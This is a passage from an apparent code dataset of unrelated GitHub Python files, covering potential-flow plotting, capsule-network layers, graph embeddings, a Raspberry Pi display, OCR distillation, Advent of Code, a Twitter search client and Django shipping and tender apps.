np.sqrt((a + X)**2 + Y**2)\nrsink = np.sqrt((X - a)**2 + Y**2)\nrcw = np.sqrt((a + X)**2 + Y**2)\nrccw = np.sqrt((X - a)**2 + Y**2)\n\n####################################################################################################\n# This section generates velocity vectors and pressure contours for a doublet with uniform flow\n# around it: Rankine Body\n\nvsorc = Q / (2 * np.pi * rho * rsorc)\nvsink = -Q / (2 * np.pi * rho * rsink)\n\nvsorcx = vsorc * ((X + a) / rsorc)\nvsorcy = vsorc * (Y / rsorc)\nvsinkx = vsink * ((X - a) / rsink)\nvsinky = vsink * (Y / rsink)\n\nvrankx = vsorcx + vsinkx + uinf\nvranky = vsorcy + vsinky\n\nvrank = np.sqrt(vrankx**2 + vranky**2)\nprank = 1 - (vrank**2 / vinf**2)\n\nvrankx = np.clip(vrankx, -50, 50)\nvranky = np.clip(vranky, -50, 50)\nprank = np.clip(prank, -10, 10)\n\n####################################################################################################\n# This section generates velocity vectors and pressure contours for a\n# two vortices with uniform flow around it: Kelvin Oval\n\nvcw = Gamma / (2 * np.pi * rcw)\nvccw = Gamma / (2 * np.pi * rccw)\n\nvcwx = vcw * (Y / rcw)\nvcwy = -vcw * ((X + a) / rcw)\nvccwx = -vccw * (Y / rccw)\nvccwy = vccw * ((X - a) / rccw)\n\nvkelvx = vccwx + vcwx\nvkelvy = vccwy + vcwy + uinf\n\nvkelv = np.sqrt(vkelvx**2 + vkelvy**2)\npkelv = 1 - (vkelv**2 / vinf**2)\n\nvkelvx = np.clip(vkelvx, -50, 50)\nvkelvy = np.clip(vkelvy, -50, 50)\npkelv = np.clip(pkelv, -10, 10)\n\n####################################################################################################\n# Plot everything\n\ndef plot_all(X, Y, x, y, vel_x, vel_y, vel, cp, pattern):\n \"\"\" Plotter for quiver and contour plots\"\"\"\n TITLE_FONT_SIZE = 10\n TICK_FONT_SIZE = 8\n\n gridspec = {'width_ratios': [1, 1], 'height_ratios': [1, 1]}\n fig, axs = plt.subplots(2, 2, figsize=(8, 6), gridspec_kw=gridspec, dpi=200, facecolor='w', edgecolor='k')\n\n # Plot 2: Velocity contours\n c1 = axs[0, 1].contour(x, y, vel, 40, cmap=cm.jet, linewidths=0.5)\n axs[0, 1].set_aspect('equal', 'box')\n axs[0, 1].set_xlim(xmin, xmax)\n axs[0, 1].set_ylim(xmin, xmax)\n axs[0, 1].set_title(f'{pattern}: Velocity Contours', fontsize=TITLE_FONT_SIZE)\n axs[0, 1].tick_params(labelsize=TICK_FONT_SIZE)\n\n norm1 = matplotlib.colors.Normalize(vmin=c1.cvalues.min(), vmax=c1.cvalues.max())\n sm1 = plt.cm.ScalarMappable(norm=norm1, cmap = c1.cmap)\n sm1.set_array([])\n\n # Set the colorbar to the first subplot (for spacing only), remove it, and set the colorbar on\n # the intended subplot.\n cb1 = plt.colorbar(c1, ax=axs[0, 0], orientation='vertical', fraction=0.046, pad=0.04)\n cb1.remove()\n cb1 = plt.colorbar(sm1, ax=axs[0, 1], orientation='vertical', fraction=0.046, pad=0.04)\n cb1.ax.tick_params(labelsize=TICK_FONT_SIZE)\n\n # Plot 1: Velocity Vectors\n axs[0, 0].quiver(X, Y, vel_x, vel_y, scale=400)\n axs[0, 0].set_aspect('equal', 'box')\n axs[0, 0].set_xlim(xmin, xmax)\n axs[0, 0].set_ylim(xmin, xmax)\n axs[0, 0].set_title(f'{pattern}: Velocity Vectors', fontsize=TITLE_FONT_SIZE)\n axs[0, 0].tick_params(labelsize=TICK_FONT_SIZE)\n\n # Plot 3: Pressure contours\n c2 = axs[1, 0].contour(x, y, cp, 40, cmap=cm.jet, linewidths=0.5)\n axs[1, 0].set_aspect('equal', 'box')\n axs[1, 0].set_xlim(xmin, xmax)\n axs[1, 0].set_ylim(xmin, xmax)\n axs[1, 0].set_title(f'{pattern}: Pressure Contours', fontsize=TITLE_FONT_SIZE)\n axs[1, 0].tick_params(labelsize=TICK_FONT_SIZE)\n\n norm2 = matplotlib.colors.Normalize(vmin=c2.cvalues.min(), vmax=c2.cvalues.max())\n sm2 = plt.cm.ScalarMappable(norm=norm2, cmap = c2.cmap)\n sm2.set_array([])\n cb2 = plt.colorbar(sm2, ax=axs[1, 0], orientation='vertical', fraction=0.046, pad=0.04)\n cb2.ax.tick_params(labelsize=TICK_FONT_SIZE)\n\n # Plot 4: Pressure contours and velocity vectors\n c3 = axs[1, 1].contour(x, y, cp, 40, cmap=cm.jet, linewidths=0.5)\n axs[1, 1].quiver(X, Y, vel_x, vel_y, scale=400, zorder=10)\n axs[1, 1].set_aspect('equal', 'box')\n axs[1, 1].set_xlim(xmin, xmax)\n axs[1, 1].set_ylim(xmin, xmax)\n axs[1, 1].set_title(f'{pattern}: Pressure Contours and Velocity Vectors', fontsize=TITLE_FONT_SIZE)\n axs[1, 1].tick_params(labelsize=TICK_FONT_SIZE)\n\n norm3 = matplotlib.colors.Normalize(vmin=c2.cvalues.min(), vmax=c2.cvalues.max())\n sm3 = plt.cm.ScalarMappable(norm=norm3, cmap = c3.cmap)\n sm3.set_array([])\n cb3 = plt.colorbar(sm3, ax=axs[1, 1], orientation='vertical', fraction=0.046, pad=0.04)\n cb3.ax.tick_params(labelsize=TICK_FONT_SIZE)\n\n plt.tight_layout()\n\n fig.savefig(f'../fig/project1_part3_{pattern.lower().replace(\" \", \"_\")}.png', bbox_inches='tight')\n\n# Plot Rankine Body\nplot_all(X, Y, x, y, vrankx, vranky, vrank, prank, 'Rankine Body')\n\n# Plot Kelvin Oval\nplot_all(X, Y, x, y, vkelvx, vkelvy, vkelv, pkelv, 'Kelvin Oval')\n\nplt.show()\n","repo_name":"dpwiese/eae-126-python","sub_path":"project1/src/project1_part3.py","file_name":"project1_part3.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13967227109","text":"\"\"\"\nTaken from: https://github.com/XifengGuo/CapsNet-Keras/blob/master/capsulelayers.py\nWe're only keeping the Length, PrimaryCap and CapsuleLayer parts\n\nSome key layers used for constructing a Capsule Network. These layers can used to construct CapsNet on other dataset, \nnot just on MNIST.\n\n*NOTE*: some functions can be implemented in multiple ways, I keep all of them. You can try them for yourself just by\nuncommenting them and commenting their counterparts.\nAuthor: Xifeng Guo, E-mail: `guoxifeng1990@163.com`, Github: `https://github.com/XifengGuo/CapsNet-Keras`\n\"\"\"\n\nimport keras.backend as K\nimport tensorflow as tf\nfrom keras import initializers, layers\n\nclass Length(layers.Layer):\n \"\"\"\n Compute the length of vectors. This is used to compute a Tensor that has the same shape with y_true in margin_loss.\n Using this layer as model's output can directly predict labels by using `y_pred = np.argmax(model.predict(x), 1)`\n inputs: shape=[None, num_vectors, dim_vector]\n output: shape=[None, num_vectors]\n \"\"\"\n def call(self, inputs, **kwargs):\n return K.sqrt(K.sum(K.square(inputs), -1))\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n def get_config(self):\n config = super(Length, self).get_config()\n return config\n\ndef squash(vectors, axis=-1):\n \"\"\"\n The non-linear activation used in Capsule. It drives the length of a large vector to near 1 and small vector to 0\n :param vectors: some vectors to be squashed, N-dim tensor\n :param axis: the axis to squash\n :return: a Tensor with same shape as input vectors\n \"\"\"\n norm = tf.norm(vectors, axis=axis, keepdims=True)\n squared_norm = norm ** 2\n scale = squared_norm / (1 + squared_norm)\n return (vectors / norm) * scale\n\n# causes circular import so do it here\nfrom activations import get_capsule_activation\n\n\nclass CapsuleLayer(layers.Layer):\n \"\"\"\n The capsule layer. It is similar to Dense layer. Dense layer has `in_num` inputs, each is a scalar, the output of the \n neuron from the former layer, and it has `out_num` output neurons. CapsuleLayer just expand the output of the neuron\n from scalar to vector. So its input shape = [None, input_num_capsule, input_dim_capsule] and output shape = \\\n [None, num_capsule, dim_capsule]. For Dense Layer, input_dim_capsule = dim_capsule = 1.\n \n :param num_capsule: number of capsules in this layer\n :param dim_capsule: dimension of the output vectors of the capsules in this layer\n :param routings: number of iterations for the routing algorithm\n \"\"\"\n def __init__(self, num_capsule, dim_capsule, routings=3,\n kernel_initializer='glorot_uniform', squash_activation=squash,\n **kwargs):\n super(CapsuleLayer, self).__init__(**kwargs)\n self.num_capsule = num_capsule\n self.dim_capsule = dim_capsule\n self.routings = routings\n self.squash_activation = get_capsule_activation(squash_activation)\n self.kernel_initializer = initializers.get(kernel_initializer)\n\n def build(self, input_shape):\n assert len(input_shape) >= 3, \"The input Tensor should have shape=[None, input_num_capsule, input_dim_capsule]\"\n self.input_num_capsule = input_shape[1]\n self.input_dim_capsule = input_shape[2]\n\n # Transform matrix\n self.W = self.add_weight(shape=[self.num_capsule, self.input_num_capsule,\n self.dim_capsule, self.input_dim_capsule],\n initializer=self.kernel_initializer,\n name='W')\n\n self.built = True\n\n def call(self, inputs, training=None):\n # inputs.shape=[None, input_num_capsule, input_dim_capsule]\n # inputs_expand.shape=[None, 1, input_num_capsule, input_dim_capsule]\n inputs_expand = K.expand_dims(inputs, 1)\n\n # Replicate num_capsule dimension to prepare being multiplied by W\n # inputs_tiled.shape=[None, num_capsule, input_num_capsule, input_dim_capsule]\n inputs_tiled = K.tile(inputs_expand, [1, self.num_capsule, 1, 1])\n\n # Compute `inputs * W` by scanning inputs_tiled on dimension 0.\n # x.shape=[num_capsule, input_num_capsule, input_dim_capsule]\n # W.shape=[num_capsule, input_num_capsule, dim_capsule, input_dim_capsule]\n # Regard the first two dimensions as `batch` dimension,\n # then matmul: [input_dim_capsule] x [dim_capsule, input_dim_capsule]^T -> [dim_capsule].\n # inputs_hat.shape = [None, num_capsule, input_num_capsule, dim_capsule]\n inputs_hat = K.map_fn(lambda x: K.batch_dot(x, self.W, [2, 3]), elems=inputs_tiled)\n\n # Begin: Routing algorithm ---------------------------------------------------------------------#\n # The prior for coupling coefficient, initialized as zeros.\n # b.shape = [None, self.num_capsule, self.input_num_capsule].\n b = tf.zeros(shape=[K.shape(inputs_hat)[0], self.num_capsule, self.input_num_capsule])\n\n assert self.routings > 0, 'The routings should be > 0.'\n for i in range(self.routings):\n # c.shape=[batch_size, num_capsule, input_num_capsule]\n c = tf.nn.softmax(b, axis=1)\n\n # c.shape = [batch_size, num_capsule, input_num_capsule]\n # inputs_hat.shape=[None, num_capsule, input_num_capsule, dim_capsule]\n # The first two dimensions as `batch` dimension,\n # then matmal: [input_num_capsule] x [input_num_capsule, dim_capsule] -> [dim_capsule].\n # outputs.shape=[None, num_capsule, dim_capsule]\n outputs = self.squash_activation(K.batch_dot(c, inputs_hat, [2, 2])) # [None, 10, 16]\n\n if i < self.routings - 1:\n # outputs.shape = [None, num_capsule, dim_capsule]\n # inputs_hat.shape=[None, num_capsule, input_num_capsule, dim_capsule]\n # The first two dimensions as `batch` dimension,\n # then matmal: [dim_capsule] x [input_num_capsule, dim_capsule]^T -> [input_num_capsule].\n # b.shape=[batch_size, num_capsule, input_num_capsule]\n b += K.batch_dot(outputs, inputs_hat, [2, 3])\n # End: Routing algorithm -----------------------------------------------------------------------#\n\n return outputs\n\n def compute_output_shape(self, input_shape):\n return tuple([None, self.num_capsule, self.dim_capsule])\n\n def get_config(self):\n config = {\n 'num_capsule': self.num_capsule,\n 'dim_capsule': self.dim_capsule,\n 'routings': self.routings,\n 'squash_activation': self.squash_activation\n }\n base_config = super(CapsuleLayer, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\ndef PrimaryCap(inputs, dim_capsule, n_channels, kernel_size, strides, padding, initializer, to_flatten=False, name='primarycap'):\n \"\"\"\n Apply Conv2D `n_channels` times and concatenate all capsules\n :param inputs: 4D tensor, shape=[None, width, height, channels]\n :param dim_capsule: the dim of the output vector of capsule\n :param n_channels: the number of types of capsules\n :return: output tensor, shape=[None, num_capsule, dim_capsule]\n \"\"\"\n\n # modified original code a bit\n output = layers.Conv2D(filters=dim_capsule*n_channels, kernel_size=kernel_size, strides=strides, padding=padding,\n kernel_initializer=initializer, name='primarycap_conv2d')(inputs)\n if to_flatten:\n # flatten to shape [all capsules * height * width, dim_capsule]\n output = layers.Reshape(target_shape=(-1, dim_capsule), name='primarycap_reshape')(output)\n else:\n # reshape to 4D\n _, H, W, _ = output.shape\n output = layers.Reshape(target_shape=(H.value, W.value, n_channels, dim_capsule), name='primarycap_reshape')(output)\n return layers.Lambda(squash, name=name)(output)","repo_name":"btruhand/Parameter-Reduction-in-CapsNet","sub_path":"layers/capsule.py","file_name":"capsule.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31187073809","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport networkx as nx\nimport pandas as pd\nimport os\nimport argparse\nimport time\n\n\n\n\npd.options.mode.chained_assignment = None # default='warn'\n\n#reading multilayer network\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"performs PPI prediction and evaluation\")\n\n parser.add_argument('--multilayer_networkfile', nargs='?',\n help='multilayer_networkfile',type=str)\n parser.add_argument('--T', nargs='?',\n help= 'window size',type=int)\n parser.add_argument('--d', nargs='?',\n help= 'embedding dimension',type=int)\n parser.add_argument('--type', default = 'gml',\n help= 'network file type (gml or edgelist)',type=str)\n \n return parser.parse_args()\n\n\ndef main(args):\n start = time.time()\n import functions as f\n\n w = args.T\n d = args.d\n \n typ = args.type\n\n print(\"Computing embedding for: w=\" + str(w) + \";d=\" + str(d))\n\n\n out_folder = \"BRANEnet_emb\"\n\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n\n # read multilayer network\n if typ == 'gml':\n G = nx.read_gml(args.multilayer_networkfile)\n \n elif typ == 'edgelist':\n G = nx.read_edgelist(args.multilayer_networkfile)\n \n else:\n print(\"Incorrect file format\")\n \n A = nx.adjacency_matrix(G,nodelist = G.nodes)\n \n name = os.path.split(args.multilayer_networkfile)[1]\n name = name.split(\".\")[0]\n\n #compute PPMI matrix\n M = f.PPMI_matrix(A,w,1)\n\n #learn embedding\n emb = f.embedd(M,d)\n emb = pd.DataFrame(data=emb,index = G.nodes)\n idx = emb.index\n emb = emb.sort_index()\n\n outfile = os.path.join(out_folder, 'BRANet_' + name + '_w_' + str(w) + '_d_' +\n str(d) + '.emb')\n emb.to_csv(outfile,sep = ' ')\n\n with open(outfile) as f:\n lines = f.readlines()\n txt = str(len(G)) + ' ' + str(d) +'\\n'\n lines[0] = txt \n with open(outfile, \"w\") as ff:\n ff.writelines(lines)\n ff.close()\n\n print(\"Done!\")\n end = time.time()\n print(\"Time in Seconds:\" + str(format(end - start,\".2f\")))\n \n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n ","repo_name":"Surabhivj/BRANEnet","sub_path":"BRANEnet.py","file_name":"BRANEnet.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"14121167869","text":"from sensors.lcd import Lcd as Lcd\nfrom otpcode.otp import OTP as otp\nfrom sensors.laser import Laser as Laser\nfrom sensors.ultrasonic_ranging import UltrasonicRanging as Ultrasound\nimport time\nimport RPi.GPIO as GPIO\n\nGPIO.setwarnings(False)\nLcdScreen = Lcd()\ncodeGenerator = otp('patch of grass')\nlaserPointer = Laser()\nultrasoundSensor = Ultrasound()\n\ndef run():\n timeout = -1\n while True:\n if timeout > 0 and time.time() - timeout < 30:\n LcdScreen.setUpperText('Hi! Your code is')\n LcdScreen.setLowerText(' ' + codeGenerator.getCode() + ' ')\n laserPointer.turnOn()\n time.sleep(2)\n else:\n if ultrasoundSensor.getDistanceInCm() < 50:\n timeout = time.time()\n else:\n timeout = -1\n LcdScreen.clearDisplay()\n laserPointer.turnOff()\n\ndef close():\n LcdScreen.clearDisplay()\n laserPointer.turnOff()\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n try:\n run()\n except KeyboardInterrupt:\n close()\n","repo_name":"glasgow2016/team-8","sub_path":"jp_api/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29134294524","text":"from torch import nn\nfrom .base_model import BaseModel\nfrom torchocr.utils.ckpt import load_pretrained_params\n\n__all__ = ['DistillationModel']\n\n\nclass DistillationModel(nn.Module):\n def __init__(self, config):\n \"\"\"\n the module for OCR distillation.\n args:\n config (dict): the super parameters for module.\n \"\"\"\n super().__init__()\n self.model_list = nn.ModuleDict()\n for key in config[\"Models\"]:\n model_config = config[\"Models\"][key]\n freeze_params = False\n pretrained = None\n if \"freeze_params\" in model_config:\n freeze_params = model_config.pop(\"freeze_params\")\n if \"pretrained\" in model_config:\n pretrained = model_config.pop(\"pretrained\")\n model = BaseModel(model_config)\n if pretrained is not None:\n load_pretrained_params(model, pretrained)\n if freeze_params:\n for param in model.parameters():\n param.requires_grad = False\n self.model_list.add_module(key, model)\n\n def forward(self, x, data=None):\n result_dict = dict()\n for model_name in self.model_list:\n result_dict[model_name] = self.model_list[model_name](x, data)\n return result_dict\n","repo_name":"WenmuZhou/PytorchOCR","sub_path":"torchocr/modeling/architectures/distillation_model.py","file_name":"distillation_model.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1192,"dataset":"github-code","pt":"78"} +{"seq_id":"8564913562","text":"\n\n# https://adventofcode.com/2021/day/1\n# https://www.pythontutorial.net/python-basics/python-read-text-file/\ndef task1():\n with open('Day1/aoc_day1_task1_input.txt') as f:\n inputlines = f.readlines()\n\n previousline = None\n currentline = None\n biggercount = 0\n linecount = 0\n\n for line in inputlines:\n previousline = currentline\n currentline = int(line)\n linecount += 1\n\n try:\n if currentline > previousline:\n biggercount += 1\n\n except TypeError:\n print(\"except block: first comparison\")\n\n print(\"Total number of lines: \" + str(linecount))\n print(\"Count of larger measurements: \" + str(biggercount))\n\n\n\n# https://adventofcode.com/2021/day/1#part2\ndef task2():\n sw_sums = []\n\n inputlines = []\n with open('Day1/aoc_day1_task1_input.txt') as f:\n inputlines = f.readlines()\n\n for iterationCount in range(0, len(inputlines)-2): # yläraja ei inklusiivinen joten vikan ikkunan laskeminen aloitetaan indeksistä -3\n currentSum = sum(list(map(int, inputlines[iterationCount:iterationCount+3])))\n sw_sums.append(currentSum)\n\n sums_count = 1 # vertailu ei laske ekaa alkiota\n count_greater_than = 0\n\n for j in range(1, len(sw_sums)):\n sums_count += 1\n if sw_sums[j] > sw_sums[j-1]:\n count_greater_than += 1\n\n print(\"Total count of lines: \" + str(len(inputlines)))\n print(\"Total count of sums: \" + str(sums_count))\n print(\"Sums greater than previous: \" + str(count_greater_than))\n\n\n","repo_name":"ajupar/advent_of_code_2021","sub_path":"Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41863038339","text":"import requests\nimport json\n\nclass Recent:\n entity = None\n bearer_token = None\n\n # def __init__(self, entity, bearer_token):\n # self.entity = entity\n # self.bearer_token = bearer_token\n\n def __create_headers(self, bearer_token):\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n def get_query(self):\n url = \"https://api.twitter.com/2/tweets/search/recent?query=entity:\" + self.entity + \" lang:en&max_results=100&tweet.fields=created_at\"\n headers = self.__create_headers(self.bearer_token)\n response = requests.get(url, headers=headers)\n\n if response.status_code != 200:\n raise Exception(\n \"Cannot get stream (HTTP {}): {}\".format(\n response.status_code, response.text\n )\n )\n return response.json()","repo_name":"bakhyaddin/swe-573","sub_path":"backend/posts/recent.py","file_name":"recent.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42782606636","text":"from django.core.validators import RegexValidator\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom io import BytesIO\nfrom django.core.files import File\nfrom django.db.models.signals import post_delete, pre_save\nfrom django.dispatch import receiver\nfrom django.db import models\nfrom django.conf import settings\n\n \n\"\"\" Whenever ANY model is deleted, if it has a file field on it, delete the associated file too\"\"\"\n@receiver(post_delete)\ndef delete_files_when_row_deleted_from_db(sender, instance, **kwargs):\n for field in sender._meta.concrete_fields:\n if isinstance(field,models.FileField):\n instance_file_field = getattr(instance,field.name)\n delete_file_if_unused(sender,instance,field,instance_file_field)\n \n\"\"\" Delete the file if something else get uploaded in its place\"\"\"\n\n@receiver(pre_save)\ndef delete_files_when_file_changed(sender,instance, **kwargs):\n # Don't run on initial save\n if not instance.pk:\n return\n for field in sender._meta.concrete_fields:\n if isinstance(field,models.FileField):\n #its got a file field. Let's see if it changed\n try:\n instance_in_db = sender.objects.get(pk=instance.pk)\n except sender.DoesNotExist:\n # We are probably in a transaction and the PK is just temporary\n # Don't worry about deleting attachments if they aren't actually saved yet.\n return\n instance_in_db_file_field = getattr(instance_in_db,field.name)\n instance_file_field = getattr(instance,field.name)\n if instance_in_db_file_field.name != instance_file_field.name:\n delete_file_if_unused(sender,instance,field,instance_in_db_file_field)\n\n\"\"\" Only delete the file if no other instances of that model are using it\"\"\" \ndef delete_file_if_unused(model,instance,field,instance_file_field):\n dynamic_field = {}\n dynamic_field[field.name] = instance_file_field.name\n other_refs_exist = model.objects.filter(**dynamic_field).exclude(pk=instance.pk).exists()\n if not other_refs_exist:\n instance_file_field.delete(False)\n\ndef user_photo_path(instance, filename):\n # file will be uploaded to MEDIA_ROOT/user_/\n return f\"recipient_photo/{instance.created_date.strftime('%Y')}/{instance.created_date.strftime('%m')}/{instance.created_date.strftime('%d')}/{instance.recipient_name}_{instance.recipient_id}/{instance.created_date}.{str.split(str(filename), '.')[-1]}\"\n\n\ndef edit_photo_before_save(image):\n photo = Image.open(image)\n photo = photo.convert('RGBA')\n maxsize = (512, 512)\n photo.thumbnail(maxsize, Image.ANTIALIAS)\n width, height = photo.size\n\n try: \n txt_img = Image.new(\"RGBA\", (700,700), (255,255,255,0))\n draw = ImageDraw.Draw(txt_img)\n text = \"仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅���清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用 \\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\"\n try:\n font = ImageFont.truetype(str(settings.STATIC_ROOT)+'/font/STHeiti Medium.ttc', 50)\n except:\n print(\"error here2\")\n textwidth, textheight = draw.textsize(text, font)\n x = 0\n y = 0\n draw.text((x, y), text=text, font=font, fill=(255, 255, 255, 150))\n txt_img = txt_img.rotate(30).crop((10, 100, width + 10, height + 100))\n try:\n photo = Image.alpha_composite(photo, txt_img)\n except:\n print(\"error here3\")\n except:\n print(\"error here1\")\n\n thumb_io = BytesIO() # create a BytesIO object\n photo = photo.convert('RGB')\n photo.save(thumb_io, 'JPEG', quality=85) \n thumbnail = File(thumb_io, name=image.name)\n return thumbnail\n\nclass Express(models.Model):\n class Meta:\n verbose_name = '快递订单'\n verbose_name_plural = \"快递订单\"\n # 代理人账号:ZZagent (固定)\n agent_account = models.CharField(max_length=200, default='ZZagent', verbose_name=\"代理人账号\")\n # 散客名称:(自动)\n auto_recipient_name = models.CharField(max_length=200, verbose_name=\"散客名称\", default='')\n #发件人姓名:选填 \n sender_name = models.CharField(max_length=200, null=True, verbose_name=\"发件人姓名(选填)\", blank=True, default='')\n #发件人手机号码:选填\n mobile_regex = RegexValidator(regex=r'(^0[789]0[0-9]{4}[0-9]{4}$)|^(13[0-9]|14[01456879]|15[0-3,5-9]|16[2567]|17[0-8]|18[0-9]|19[0-3,5-9]{3})[0-9]{8}$', message=\"请输入日本或中国手机号码(不加-)\")\n sender_mobile_num = models.CharField(validators=[mobile_regex], max_length=17, verbose_name=\"发件人手机号码\", default='')\n # 发件人国家: (固定)\n sender_country = models.CharField(max_length=200, default='日本', verbose_name=\"发件人国家\")\n # 发件人省: (固定)\n sender_province = models.CharField(max_length=200, default='埼玉县', verbose_name=\"发件人省\")\n # 发件人市: (固定)\n sender_city = models.CharField(max_length=200, default='川口市', verbose_name=\"发件人市\")\n # 发件人区(县): (固定)\n sender_district = models.CharField(max_length=200, default='幸町', verbose_name=\"发件人区(县)\")\n # 发件人地址: (固定)\n sender_address = models.CharField(max_length=200, default='〒 332-0016埼玉県川口市幸町1-14-10', verbose_name=\"发件人地址\")\n\n\n \n # 收件人姓名:(必须填写)\n recipient_name = models.CharField(max_length=200, verbose_name=\"收件人姓名\", default='')\n # 收件人手机: (必须填写)\n ch_phone_regex = RegexValidator(regex=r'^(13[0-9]|14[01456879]|15[0-3,5-9]|16[2567]|17[0-8]|18[0-9]|19[0-3,5-9]{3})[0-9]{8}$', message=\"请输入中国手机号码\")\n recipient_phone_num = models.CharField(max_length=200, validators=[ch_phone_regex], verbose_name=\"收件人手机\", default='')\n # 收件人国家:(中国) 固定\n recipient_country = models.CharField(max_length=200, default='中国', verbose_name=\"收件人国家\")\n # 收件人省:(可选择)\n recipient_province = models.CharField(max_length=200, verbose_name=\"收件人省\", default='')\n # 收件人市:(可选择)\n recipient_city = models.CharField(max_length=200, verbose_name=\"收件人市\", default='')\n # 收件人区(县):(可选择)\n recipient_district = models.CharField(max_length=200, verbose_name=\"收件人区(县)\", default='')\n # 收件人详细地址:xx省xx市xx区(县)xx号\n recipient_addr = models.CharField(max_length=200, verbose_name=\"收件人详细地址\", default='')\n # 收件人身份证号码: \n id_regex = RegexValidator(regex=r'^[1-9]\\d{5}(18|19|20)\\d{2}((0[1-9])|(1[0-2]))(([0-2][1-9])|10|20|30|31)\\d{3}[0-9Xx]$', message=\"请输入正确的身份证号\")\n recipient_id = models.CharField(validators=[id_regex], max_length=200, verbose_name=\"收件人身份证号码\", default='')\n #发件登录日期时间 (自动)\n created_date = models.DateTimeField(auto_now_add=True, verbose_name=\"发件人登录时间\")\n #发件人微信名字:(必须填写)\n sender_wechat_name = models.CharField(max_length=200, verbose_name=\"发件人微信名字\", default='')\n #发件人微信号:(必须填写)\n sender_wechat_num = models.CharField(max_length=200, verbose_name=\"发件人微信号\", default='')\n #发件店铺\n shop = models.CharField(max_length=200, null=True, verbose_name=\"发件店铺\")\n # 收件人身份证照片上传:建议上传 如遇海关抽查不能及时提交身份证照片出现任何问题我司概不负责\n recipient_photo = models.ImageField(verbose_name=\"收件人身份证照片上传\", blank=True, upload_to=user_photo_path) \n\n # 快递单号\n track_number = models.CharField(max_length=200, verbose_name=\"快递单号\", null=True, blank=True)\n # 包裹状态\n packet_state = models.CharField(max_length=20, verbose_name=\"包裹状态\", default='未发送', blank=True)\n\n def save(self, *args, **kwargs):\n if not self.sender_name:\n self.sender_name = self.sender_wechat_name\n self.auto_recipient_name = self.shop[:-1]\n if self.track_number:\n self.packet_state = '已发送'\n if self.recipient_photo:\n try:\n self.recipient_photo = edit_photo_before_save(self.recipient_photo)\n except:\n pass\n super(Express, self).save(*args, **kwargs)\n\n\n def __str__(self):\n return self.sender_wechat_num + '-----' + str.split(str(self.created_date), '.')[0]+ '-----' + str(self.track_number)\n\n","repo_name":"lighthouse-plan/express","sub_path":"etrack/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9989,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19562478292","text":"from django.shortcuts import render\nfrom government_employee.models import TenderNotice\nfrom .forms import *\nfrom django.contrib.auth.decorators import login_required\nfrom government_employee.models import ApplyTenderHolderShortList, WinnerHolder\nfrom .filters import *\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import JsonResponse\nfrom django.db.models import Count\nfrom SuperAdmin.models import Ministry\n\n\ndef home_tender_list(request):\n tender = TenderUpload.objects.all()\n MyFilter = TenderUploadFilter(request.GET, queryset=tender)\n tender = MyFilter.qs\n page = request.GET.get('page', 1)\n paginator = Paginator(tender, 10)\n try:\n tender = paginator.page(page)\n except PageNotAnInteger:\n tender = paginator.page(1)\n except EmptyPage:\n tender = paginator.page(paginator.num_pages)\n\n context = {\n 'tender': tender,\n 'MyFilter': MyFilter\n }\n return render(request, 'index.html', context=context)\n\n\ndef tender_chart(request):\n labels = []\n data = []\n\n queryset = TenderUpload.objects.values('ministry_name__ministry_name').annotate(tender_count=Count('ministry_name'))\n for entry in queryset:\n labels.append(entry['ministry_name__ministry_name'])\n data.append(entry['tender_count'])\n\n return JsonResponse(data={\n 'labels': labels,\n 'data': data,\n })\n\n\ndef list_of_apply_tender(request):\n apply_tender = ApplyTender.objects.filter(username=request.user)\n page = request.GET.get('page', 1)\n paginator = Paginator(apply_tender, 10)\n 